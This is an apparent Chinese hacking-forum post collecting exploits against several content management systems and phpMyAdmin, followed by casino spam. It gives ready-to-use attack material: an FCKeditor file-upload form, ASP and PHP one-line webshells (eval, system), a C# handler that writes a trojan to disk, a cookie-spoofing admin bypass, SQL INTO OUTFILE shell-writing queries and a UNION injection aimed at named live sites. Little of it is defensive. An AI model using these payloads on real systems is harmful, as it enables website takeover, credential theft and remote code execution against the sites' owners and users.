inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
' Z) P' e8 E4 w3 O9 e2 R& P
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
1 T8 F( K4 W C7 {: @) Y
6 f* p1 {7 _ D2 N3 ~
YxShop易想购物商城4.7.1版本任意文件上传漏洞
! f3 Z- J9 d7 B/ T2 P4 M
* g% Z l0 |1 r" n9 ^% x: t
http://xxoo.com/controls/fckedit
... aspx/connector.aspx
) l& Y5 A, x4 z; z' B/ t# i% Q; l2 T$ n
跳转到网站根目录上传任意文件。
" ?$ u$ L0 L( t0 Z" M) s# u
如果connector.aspx文件被删可用以下exp,copy以下代码另存为html,上传任意文件
0 q) o: O( d. _7 o% x
<form id="frmUpload" enctype="multipart/form-data" action="http://www.xxoo.net/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post">
7 L9 a& z. C! p& C) k4 y
Upload a new file:<br>
1 J) N/ l8 I* G1 ?4 j" Q' v
<input type="file" name="NewFile" size="50"><br>
* N M, F4 h" Z: `5 u& W; [3 `! K
<input id="btnUpload" type="submit" value="Upload">
$ L( D: ] s. g$ g
</form>
' G, { v2 T! c, O5 e( J. {; {
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
/ `/ @$ S& ^$ w
" K, ]& ], `$ S
SDcms 后台拿webshell
1 H* t$ W. Q/ Y; s" B! Q" B
( c5 ^! w w: ^- o% z* V O- }$ ?
第一种方法:
7 Y5 a: Y3 z/ D9 j- b
进入后台-->系统管理-->系统设置-->系统设置->网站名称;
8 f* u, Z6 U; z: q# ~- k8 o: h3 K
把网站名称内容修改为 "%><%eval request("xxx")' //密码为xxx
( ?+ O9 O5 ~5 v" ]1 Y
用菜刀链接
http://www.xxx.com/inc/const.asp
就搞定了。
5 D+ \+ _, X% q& s
第二种方法:
4 o9 c6 c% B7 Q8 b- M
进入后台-->系统管理-->系统设置-->系统设置->上传设置;
) l6 ? p, I8 S5 h2 C$ x s
在文件类型里面添加一个aaspsp的文件类型,然后找一个上传的地方直接上传asp文件! 注:修改文件类型后不能重复点保存!
/ c) z: k7 M. W! ?. A' Z5 Z) p+ q
第三种方法:
0 y& T! h- T5 M9 S
进入后台-->界面管理-->模板文件管理-->创建文件
" Y! X0 c9 q, j L6 [" U
文件名写入getshell.ashx
* B# r3 }: J, e7 l
内容写入下面内容:
+ a* |5 I; ?' u
/====================复制下面的=========================/
1 {$ x: w6 m0 x- @) D
<%@ WebHandler Language="C#" Class="Handler" %>
# }5 p+ {3 z/ f
using System;
7 q% A6 A0 z: x! Y, K S
using System.Web;
1 b: W8 b" _- P D* h8 d
using System.IO;
3 @ u$ m- ?7 V
public class Handler : IHttpHandler {
# |0 V/ F3 S' D3 a9 Y! B: o
public void ProcessRequest (HttpContext context) {
; K* }% `& E: ^( g+ s5 l
context.Response.ContentType = "text/plain";
8 o9 O1 O, q$ Y6 D d
StreamWriter file1= File.CreateText(context.Server.MapPath("getshell.asp"));
. x$ t# r: z8 D! u9 g
file1.Write("<%response.clear:execute request(\"xxx\"):response.End%>");
# p/ \1 B+ n0 M3 V
file1.Flush();
$ A; y0 @2 L0 `$ h) }
file1.Close();
+ x/ m% q3 m s' C( M2 N+ X# W
}
: ^& n5 d& h L ]# |, u4 n: t# o
public bool IsReusable {
4 r% b- d- b# J' w0 r' r
get {
8 t. t8 u/ t9 y( v* o
return false;
. q8 v6 o8 Z5 G
}
. [6 s3 O) Q: B- |* W$ z
}
9 L8 ?/ M6 l& c) ~% h% G
}
7 y& s0 f. H" p" w* v; I9 @9 |
/=============================================/
! P* m1 E7 O7 y1 G* Y
访问这个地址:
http://www.xxx.com/skins/2009/getshell.ashx
" l3 J2 t o# T; N9 i. C
会在
http://www.xxx.com/skins/2009/
目录下生成getshell.asp 一句话木马 密码为xxx 用菜刀链接
: d _# W4 d) G$ d8 ^* _& ? _* T
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
0 N+ m" _/ I q- [, `
1 [7 n% [ n6 g& i2 H
ESCMS网站管理系统0day
; ]0 v* M) z, P" ?+ D0 j
$ S8 h. l5 P5 _+ E! ]3 D$ W
后台登陆验证是通过admin/check.asp实现的
8 y) i; V, [5 V9 T4 O5 h1 L
9 t6 r% F8 u/ V6 Y; v
首先我们打开
http://target.com/admin/es_index.html
, L a6 i. m( A' k; R
然后在COOKIE结尾加上
5 w, M0 ~* M' x: p
; ESCMS$_SP2=ES_admin=st0p;
& G7 S, T! ^3 g( G
修改,然后刷新
7 N, ]. i4 Z0 g% U# i6 ?3 S
进后台了嘎..
0 C. G, i+ b2 d
然后呢…提权,嘿嘿,admin/up2.asp,上传目录参数filepath过滤不严,导致可截断目录,生成SHELL
r ^ Y1 m5 S0 { Q% Z
; K9 C6 X4 Y7 w* t0 C+ d2 s* V
利用方法,可以抓包,然后改一下,NC上传,还可以直接用DOMAIN等工具提交.
3 R& {$ b5 \6 p
嘿嘿,成功了,shell地址为
http://target.com/admin/diy.asp
/ j! }" B* y7 w! _
存在这个上传问题的还有admin/downup.asp,不过好像作者的疏忽,没有引用inc/ESCMS_Config.asp,导致打开此页面失败..
4 v, g7 [4 b- S
在版本ESCMS V1.0 正式版中,同样存在上传问题admin/up2.asp和admin/downup.asp都可利用,只不过cookies欺骗不能用了
- n4 V! Z/ Z5 G/ w; _- c$ z
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
! q; ]$ O* I" f: Y m6 F% p
# B& z, \& b; M& E; o
宁志网站管理系统后台无验证漏洞及修复
' m& w; y4 l8 F2 W
! B- s# K. { I* Z% |. y
网上搜了一下,好像没有发布.如有雷同纯粹巧合!
7 o& k( `5 w+ ]& k4 v( P
官方网站:
www.ningzhi.net
* ]9 Q" T+ I) S# j9 ?+ D' L6 M
学校网站管理系统 V.2011版本
# ]- y, O: j3 B
http://down.chinaz.com/soft/29943.htm
" E. O% ~2 q+ @! O ]
其它版本(如:政府版等),自行下载.
7 v3 e& h6 b$ K. F- n3 W$ M @* U2 |
漏洞说明:后台所有文件竟然都没有作访问验证...相当无语...竟然用的人还很多.汗~~~
. P) E9 ^ c, R3 f( A
login.asp代码如下:
8 V1 m: Y$ H- z! `
<% response.Write"<script language=javascript>alert('登陆成功!请谨慎操作!谢谢!');this.location.href='manage.asp';</script>" %>
4 N, a, Q, @% X9 ? h$ n
manage.asp代码我就不帖出来了.反正也没验证.
$ O9 n6 p( r3 Q2 o
只要访问登陆页就可以成功登陆.....蛋疼~~~ 对此本人表示不理解!
* I$ Z( R1 L( U1 x' |
漏洞利用:
/ K/ X" W' A" B% Z: s# i
直接访问
http://www.0855.tv/admin/manage.asp
( D0 q g& S1 O* K* Y3 u
数据库操作:
http://www.0855.tv/admin/manage_web.asp?txt=5&id=web5
8 t$ b! c3 e. l, B; M l$ x/ s' m, Q
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
6 k8 p5 s* f) y7 \! Q( Q* n5 x
- H( ^% R/ s# `( d
phpmyadmin拿shell的四种方法总结及修复
& L( [ f; {0 ?, U2 M
6 T' }" D+ c: k. d: I, Y# L# I
方法一:
+ r& Y6 H4 J! j2 {4 Z, g0 I
CREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );
0 L. u4 W3 B, M, l" w! x* |5 u8 d
INSERT INTO `mysql`.`study` (`7on` )VALUES ('<?php @eval($_POST[7on])?>');
4 [8 z! }! J7 n6 {
SELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php';
" l* i L5 r$ W: w. m; G$ q
----以上同时执行,在数据库: mysql 下创建一个表名为:study,字段为7on,导出到E:/wamp/www/7.php
6 i" ~4 e* W- ?* n/ k: x
一句话连接密码:7on
8 n2 m# c' w! P/ `% p
方法二:
9 o$ q/ \; t {1 Y
读取文件内容: select load_file('E:/xamp/www/s.php');
& D4 ?4 P. N h5 s8 q) b( g
写一句话: select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/study.php'
. Y7 n) y4 I7 A. \8 K7 Z. I
cmd执行权限: select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
# A G/ U. `( S
方法三:
: O: G0 b& A# a+ H) f5 z, u
JhackJ版本 PHPmyadmin拿shell
r7 ?9 O5 m) l1 D( }* f
Create TABLE study (cmd text NOT NULL);
$ P4 U7 K/ j' H' `( F Z
Insert INTO study (cmd) VALUES('<?php eval($_POST[cmd])?>');
8 f: p6 X5 M. [/ ?: K' ]
select cmd from study into outfile 'E:/wamp/www/7.php';
2 T# O7 X; z/ j$ y. }( v1 i- T8 S
Drop TABLE IF EXISTS study;
3 c% V1 ?( U" Q# ~9 [' ^
<?php eval($_POST[cmd])?>
; I) M. i( n. w0 H
CREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。
, t# S6 ~! ~9 }4 \& \ V
INSERT INTO study( cmd ) VALUES ('<?php eval($_POST[cmd])?>');# 影响列数: 1
4 M: H+ a _* C
SELECT cmdFROM study INTO OUTFILE 'E:/wamp/www/7.php';# 影响列数: 1
0 c* A* c, a: j1 R2 T" {! `) O
DROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。
$ c+ C' |, L, p( ^' A; I
方法四:
* k/ I* I2 g' ?3 [' Y
select load_file('E:/xamp/www/study.php');
. l. T; w6 K% K
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
$ r* d* T% m6 M7 |& {
然后访问网站目录:
http://www.2cto.com/study.php?cmd=dir
: R9 ]9 N; {0 a/ ?3 G5 {9 C# U2 k
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------
' [" R* c6 V# e7 E8 t
& t- R/ `# r' C9 H7 {
NO.001中学网站管理系统 Build 110628 注入漏洞
. ^3 H4 C( R1 S$ J g: O- N" G
1 @# D- q% P( p
NO.001中学网站管理系统功能模块:
0 m" @7 C; W/ _2 @/ R! L
1.管理员资料:网站的基本信息设置(校长邮箱等),数据库备份,用户管理、部门及权限管理等
" Z( M! G( W3 d" F2 I
2.学校简介:一级分类,可以添加校园简介,领导致辞、校园风光、联系我们。。。等信息
0 _, `( ~! |& B* v$ q& m- |: O% y
3.文章管理:二级分类,动态添加各相关频道(图片视频频道、学校概况频道除外)文章等信息
+ b [- L8 b$ A0 H3 O) B9 F4 @' D+ V
4.视频图片管理:一级分类,动态添加视频或者图片等信息
' C$ A( L" A: _5 {8 d" @
5.留言管理:对留言,修改,删除、回复等管理
+ }0 F0 }3 n( h3 H
6.校友频道:包括校友资料excel导出、管理等功能
7 s$ k7 @! ?0 \ m8 F
7.友情链接管理:二级分类,能建立不同种类的友情链接显示在首页
: i) U; @! m6 g
默认后台:admin/login.asp
$ _/ A' f% I" p* X- m+ ~! F
官方演示:
http://demo.001cms.net
' ~$ S0 i" e( _7 V; n9 C) n
源码下载地址:
http://down.chinaz.com/soft/30187.htm
: `8 ]6 R* ?: D2 B
EXP:
$ ^# V" q: V5 y5 G7 M5 A
union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
2 N: \. ]* t' g2 T6 U/ h
测试:
http://demo.001cms.net/shownews.asp?type=
新闻动态&stype=校务公开&id=484 union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
3 L- W$ O4 c. @
getshell:后台有备份,你懂的
2 A4 A. `# @" C/ k* c
另:FCK编辑器有几处可利用.大家自己行挖掘,由于相关内容较多,我在这里就不说了。
7 s) J; Q l$ I$ {% x
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
作者:
匿名
时间:
2017-10-28 08:21
casino slots
online casino canada
new online casino
slot machines
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2